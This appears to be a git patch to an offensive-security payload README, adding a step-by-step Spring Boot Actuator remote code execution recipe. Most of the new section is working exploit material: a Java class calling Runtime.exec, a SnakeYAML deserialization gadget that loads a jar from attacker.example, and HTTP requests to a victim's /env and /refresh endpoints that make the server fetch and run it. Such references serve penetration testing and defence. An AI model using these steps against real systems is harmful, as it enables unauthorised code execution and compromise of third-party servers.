From 1535077d9d1f9af658305ec5531dbafcf8517e47 Mon Sep 17 00:00:00 2001 From: marcan2020 Date: Wed, 28 Oct 2020 12:05:12 -0400 Subject: [PATCH] Add Springboot Actuator RCE --- Insecure Management Interface/README.md | 85 +++++++++++++++++++++++-- 1 file changed, 80 insertions(+), 5 deletions(-) diff --git a/Insecure Management Interface/README.md b/Insecure Management Interface/README.md index 9bb8511..31be574 100644 --- a/Insecure Management Interface/README.md +++ b/Insecure Management Interface/README.md @@ -4,16 +4,91 @@ Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. -For example, the health endpoint provides basic application health information. +For example, the `/health` endpoint provides basic application health information. + Some of them contains sensitive info such as : -- `/trace` (by default the last 100 HTTP requests with headers) -- `/env` (the current environment properties) -- `/heapdump` (builds and returns a heap dump from the JVM used by our application). +- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers). +- `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment). +- `/heapdump` - Builds and returns a heap dump from the JVM used by our application. +- `/dump` - Displays a dump of threads (including a stack trace). +- `/logfile` - Outputs the contents of the log file. +- `/mappings` - Shows all of the MVC controller mappings. -These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default. +These endpoints are enabled by default in Springboot 1.X. +Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. +Since Springboot 2.X only `/health` and `/info` are enabled by default. + +### Remote Code Execution via `/env` + +Spring is able to load external configurations in the YAML format. +The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks. +In other words, an attacker can gain remote code execution by loading a malicious config file. + +#### Steps + +1. Generate a payload of SnakeYAML deserialization gadget. + +- Build malicious jar +```bash +git clone https://github.com/artsploit/yaml-payload.git +cd yaml-payload +# Edit the payload before executing the last commands (see below) +javac src/artsploit/AwesomeScriptEngineFactory.java +jar -cvf yaml-payload.jar -C src/ . +``` + +- Edit src/artsploit/AwesomeScriptEngineFactory.java + +```java +public AwesomeScriptEngineFactory() { + try { + Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE + } catch (IOException e) { + e.printStackTrace(); + } +} +``` + +- Create a malicious yaml config (yaml-payload.yml) + +```yaml +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker.example/yaml-payload.jar"] + ]] +] +``` + + +2. Host the malicious files on your server. + +- yaml-payload.jar +- yaml-payload.yml + + +3. Change `spring.cloud.bootstrap.location` to your server. + +``` +POST /env HTTP/1.1 +Host: victim.example:8090 +Content-Type: application/x-www-form-urlencoded +Content-Length: 59 + +spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml +``` + +4. Reload the configuration. + +``` +POST /refresh HTTP/1.1 +Host: victim.example:8090 +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 +``` ## References * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) +* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)